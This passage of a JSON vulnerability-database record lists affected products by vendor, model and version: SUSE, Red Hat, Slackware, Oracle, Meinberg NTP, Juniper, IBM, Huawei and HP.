        "vendor": "suse",
        "version": "11.4"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "12"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "12.3"
      },
      {
        "model": "enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux workstation optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux hpc node optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux desktop optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "enterprise linux computenode optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux computenode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux client optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.2"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "11.1"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.1.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "10.4.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.9.1"
      },
      {
        "model": "communications policy management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "9.7.3"
      },
      {
        "model": "network time protocol 4.2.7p10",
        "scope": null,
        "trust": 0.3,
        "vendor": "meinberg",
        "version": null
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.7"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.6"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.5"
      },
      {
        "model": "network time protocol 4.2.4p8@lennon-o-lpv",
        "scope": null,
        "trust": 0.3,
        "vendor": "meinberg",
        "version": null
      },
      {
        "model": "network time protocol 4.2.4p7@copenhagen-o",
        "scope": null,
        "trust": 0.3,
        "vendor": "meinberg",
        "version": null
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.4"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.2"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.2.0"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.1.0"
      },
      {
        "model": "network time protocol",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "meinberg",
        "version": "4.0"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1x8664"
      },
      {
        "model": "business server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "1"
      },
      {
        "model": "vgw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "nsmexpress",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "nsm server software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "nsm series appliances",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "nsm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "junos os 14.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r2-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 14.1r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r3-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r2-s3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.3r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2x51-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2r5-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.2r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.1x50-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.1r4-s3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 13.1r4-s2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.3r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.2x50-d70",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.2r9",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x47-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x47-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x46-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x46-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 12.1x44-d40",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 11.4r12-s4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os 11.4r12-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "0"
      },
      {
        "model": "xeon phi 7120p",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi 7120a",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi 5110p",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon phi 3120a",
        "scope": null,
        "trust": 0.3,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.4"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.3"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.2"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "3.1"
      },
      {
        "model": "manycore platform software stack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "2.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.14"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.5"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.4"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.9"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.8"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.13"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.12"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.11"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.10"
      },
      {
        "model": "smartcloud entry fp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.19"
      },
      {
        "model": "smartcloud entry",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "77100"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "77000"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "76000"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56003"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56002"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56001"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "71005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "71005.2"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "51005.2"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "41005.2"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.3"
      },
      {
        "model": "security network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "31005.2"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.8"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.9"
      },
      {
        "model": "pureflex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3950x6"
      },
      {
        "model": "pureflex",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x3850x6"
      },
      {
        "model": "pureflex x240m5+pen",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "pureflex x240m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "pureflex x220m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "puredata system for operational analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "puredata system for operational analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.2.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.1.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.9.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.8.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.7.0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.3.0"
      },
      {
        "model": "nextscale nx360m5",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "nextscale nx360m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "netezza host management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3.3"
      },
      {
        "model": "infosphere guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "infosphere guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "infosphere guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.2"
      },
      {
        "model": "idataplex dx360m4",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "flex system p460 compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-43x)0"
      },
      {
        "model": "flex system p460",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-42x)0"
      },
      {
        "model": "flex system p270 compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7954-24x)0"
      },
      {
        "model": "flex system p260 compute node /fc efd9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "flex system p260",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-23x)0"
      },
      {
        "model": "flex system p260",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7895-22x)0"
      },
      {
        "model": "flex system p24l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "rack v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "x8000"
      },
      {
        "model": "v1300n v100r002c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "tecal xh621 v100r001c00b010",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "tecal xh320 v100r001c00spc105",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "tecal xh311 v100r001c00spc100",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "tecal xh310 v100r001c00spc100",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh5885h v100r003c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v3"
      },
      {
        "model": "rh5885 v100r003c01",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v3"
      },
      {
        "model": "rh5885 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2485 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2288h v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2288e v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2288 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2285h v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh2285 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "rh1288 v100r002c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "oceanstor uds v100r002c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor uds v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s6800t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s5800t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s5600t v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s5500t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor s2600t v200r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor hvs88t v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor hvs85t v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor 18800f v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "oceanstor v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "18800"
      },
      {
        "model": "high-density server dh628 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "high-density server dh621 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "high-density server dh620 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "high-density server dh320 v100r001c00",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "huawei",
        "version": "v2"
      },
      {
        "model": "fusionsphere openstack v100r005c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c02spc300",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c02spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c02spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncube v100r002c01spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r005c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r005c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r003c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusioncompute v100r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusionaccess v100r005c20",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "fusionaccess v100r005c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vtm v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vtm v100r001c30",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vtm v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace vcn3000 v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace usm v200r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace uc v200r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace uc v200r002c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace uc v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace u2980 v200r003c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace u2980 v100r001c02spc200",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace u2980 v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace ivs v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r002c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r001c03",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r001c02",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace dcm v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c50",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c32",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c31",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cc v200r001c03",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace cad v100r001c01lhue01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight uc\u0026c v100r001c20",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight uc\u0026c v100r001c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight network v200r005c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight network v200r003c10",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "esight network v200r003c01",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "e9000 chassis v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "e6000 chassis v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "dc v100r002c01spc001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "wx5004-ei (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5)0"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.10"
      },
      {
        "model": "virtualization performance viewer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
